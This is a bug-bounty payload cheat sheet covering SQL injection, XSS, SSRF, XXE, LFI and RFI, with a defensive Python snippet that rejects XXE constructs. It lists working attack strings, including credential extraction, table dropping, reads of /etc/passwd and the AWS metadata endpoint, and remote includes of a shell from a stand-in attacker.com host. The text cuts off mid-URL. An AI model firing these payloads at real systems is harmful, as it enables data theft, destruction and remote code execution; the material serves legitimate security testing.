A curated collection of payloads and resources for various vulnerabilities encountered during bug bounty assessments.
SQL Injection allows attackers to interfere with the queries that an application makes to its database.
' OR '1'='1
– Basic authentication bypass.
1; DROP TABLE users --
– Attempt to drop a table.
' UNION SELECT username, password FROM users --
– Extract user credentials.
For a comprehensive list of SQLi payloads, refer to PayloadsAllTheThings - SQL Injection.
XSS allows attackers to inject malicious scripts into web pages viewed by other users.
<script>alert('XSS')</script>
– Basic alert script.
"><script>alert('XSS')</script>
– Breaking out of attributes.
<img src=x onerror=alert('XSS')>
– Using image error event.
Explore more XSS payloads at PayloadsAllTheThings - XSS Injection.
SSRF vulnerabilities allow an attacker to induce the server-side application to make HTTP requests to an arbitrary domain.
http://localhost:22
– Access internal services.
http://169.254.169.254/latest/meta-data/
– AWS metadata endpoint.
http://your-malicious-site.com
– Exfiltrate data to external server.
Detailed SSRF payloads can be found at PayloadsAllTheThings - SSRF.
XXE attacks abuse XML parsers that resolve external entity declarations in a DOCTYPE, letting an attacker make the parser read local files or fetch remote resources.
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>
– Read system files.
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://attacker.com/evil.xml"> ]>
<foo>&xxe;</foo>
– Fetch remote content, such as an external DTD.
Learn more about XXE payloads at PayloadsAllTheThings - XXE Injection.
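As an added defensive example (not part of the original collection), the following Python code uses the standard library's expat bindings to reject the DOCTYPE, entity-declaration and external-reference constructs that the two payloads above depend on, before the parser can resolve any of them. The sample documents are constructed here from the first payload listed above.

```python
import xml.parsers.expat

# Constructed sample inputs: the file-read payload from this page and a benign document.
XXE_DOC = (
    '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
    '<foo>&xxe;</foo>'
)
BENIGN_DOC = "<foo>hello</foo>"


class UnsafeXMLError(ValueError):
    """Raised when a document carries a DTD, an entity declaration or an external reference."""


def parse_hardened(data: str) -> dict:
    """Parse XML with expat, refusing DTD and entity constructs as soon as they are seen.

    Returns a small summary {"root": name, "text": character data} for the accepted document.
    """
    parser = xml.parsers.expat.ParserCreate()
    result = {"root": None, "text": ""}

    # Exceptions raised inside expat callbacks abort parsing and propagate out of Parse().
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE declaration rejected: {name}")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXMLError(f"entity declaration rejected: {name}")

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeXMLError(f"external entity reference rejected: {sysid}")

    def on_start(name, attrs):
        if result["root"] is None:
            result["root"] = name

    def on_text(text):
        result["text"] += text  # character data may arrive in several chunks

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_text
    parser.Parse(data, True)
    return result


def is_safe(data: str) -> bool:
    """True if the document parses without any DTD/entity construct; malformed XML is also rejected."""
    try:
        parse_hardened(data)
        return True
    except (UnsafeXMLError, xml.parsers.expat.ExpatError):
        return False
```

Rejecting the DOCTYPE outright also blocks internal-entity expansion attacks, which the external-entity payloads above do not cover.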
LFI vulnerabilities allow an attacker to make the web application include files from the server's own filesystem by supplying a crafted path in a request.
../../../../etc/passwd
– Access sensitive system files.
php://filter/convert.base64-encode/resource=index.php
– Encode file contents.
expect://ls
– Execute commands (only if the expect:// wrapper is enabled).
Refer to PayloadsAllTheThings - File Inclusion for more LFI payloads.
RFI allows an attacker to make the web application include and execute a file fetched from a remote host, typically by supplying a URL to an include statement in a server-side script.
http://attacker.com/shell.txt
– Include malicious scripts.
https://raw